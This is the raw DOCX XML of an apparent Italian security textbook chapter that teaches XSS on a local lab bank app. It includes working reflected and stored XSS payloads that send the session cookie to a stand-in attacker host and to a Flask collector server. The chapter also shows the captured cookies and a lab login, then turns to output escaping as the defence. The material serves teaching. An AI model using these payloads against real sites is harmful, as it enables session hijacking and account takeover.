    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(URL lunghi nel browser: copia/incolla intero). La pagina si trasforma.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai modificato l’apparenza del sito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro il browser della vittima. Un attaccante reale userebbe questo per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: redirige l’utente a una pagina che gli ruba le credenziali, in tutto identica all’originale (ma su un dominio sotto suo controllo).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="357"/>
    <w:bookmarkStart w:id="358" w:name="furto-del-cookie-di-sessione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Furto del cookie di sessione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso il vero disastro. Apri DevTools (F12), vai su Console, e digita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedi qualcosa tipo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session=eyJ1dGVudGVfaWQiOjEsInVzZXJuYW1lIjoibWFyaW8iLi4u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Questo è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cookie di sessione di Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chi ce l’ha si autentica come te.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un payload XSS che ruba questo cookie si scrive così:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://attaccante.it/raccolta?c=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</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t xml:space="preserve">Tradotto: lo script chiama un server controllato dall’attaccante, passando il cookie come parametro. L’attaccante riceve il cookie, lo inserisce nel proprio browser (con un’estensione tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">EditThisCookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e diventa l’utente vittima senza conoscerne la password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il lab, simuliamo l’attaccante con un piccolo server in ascolto. In un nuovo terminale (con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir attaccante &amp;&amp; cd attaccante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server-attaccante.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"/raccolta"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> raccolta():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[FURTO] Cookie ricevuto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'c'</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app.run(port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avvialo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python server-attaccante.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso, con BancaPiccola in esecuzione, fai login come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e vai su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('</w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:6666/raccolta?c=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' + encodeURIComponent(document.cookie))&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Guarda il terminale del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">server attaccante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[FURTO] Cookie ricevuto: session=eyJ1dGVudGVfaWQiOjEsInVzZXJuYW1lIjoibWFyaW8i...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai esfiltrato il cookie di sessione di Mario verso un server esterno.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Da qui, l’attaccante può rivivere come Mario. Stesso identico schema usato da Magecart per British Airways nel 2018 (con la differenza che lì rubavano i numeri di carta di credito direttamente dal form di pagamento).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="358"/>
    <w:bookmarkEnd w:id="359"/>
    <w:bookmarkStart w:id="360" w:name="secondo-attacco-stored-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="545" w:name="sec_8_6"/>
      <w:r>
        <w:t xml:space="preserve">8.6 Secondo attacco: Stored XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stored XSS è ancora più cattivo. Loggati come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/prodotto/1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedi la pagina del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Conto Base</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, senza commenti. Pubblica un commento normale:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bel prodotto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedrai apparire il commento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso pubblica un commento contenente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:6666/raccolta?c=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Bel prodotto!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Niente alert, ma se guardi il terminale del server attaccante, vedi che è arrivato il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tuo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cookie. Lo script è stato salvato nel database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">apri un browser privato/incognito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e accedi come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">giulia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(giulia/giulia2025). Vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/prodotto/1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Niente di visibile per Giulia: vede solo il commento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bel prodotto!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ma nel terminale del server attaccante:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[FURTO] Cookie ricevuto: session=eyJ1dGVudGVfaWQiOjMsInVzZXJuYW1lIjoiZ2l1bGlhIi4u...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il cookie di Giulia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Senza che Giulia abbia fatto nulla di sospetto. Ha solo aperto la pagina di un prodotto. Continua: ogni utente che apre la pagina del prodotto 1 invia automaticamente il proprio cookie all’attaccante.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS = compromissione automatica di tutti gli utenti che caricano la pagina infetta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="360"/>
    <w:bookmarkStart w:id="363" w:name="la-difesa-primaria-escape-delloutput"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="546" w:name="sec_8_7"/>
      <w:r>
        <w:t xml:space="preserve">8.7 La difesa primaria: escape dell’output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="546"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La causa di XSS è esattamente la stessa di SQL Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mescolare struttura e dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza separazione. In questo caso, struttura HTML e dati dell’utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La difesa è altrettanto strutturale:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">escape automatico dell’output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando inserisci un dato dell’utente in una pagina HTML, devi trasformare i caratteri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">speciali HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</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w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">entità HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;#x27;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio: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 utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Senza escape (vulnerabile)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Con escape (sicuro)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
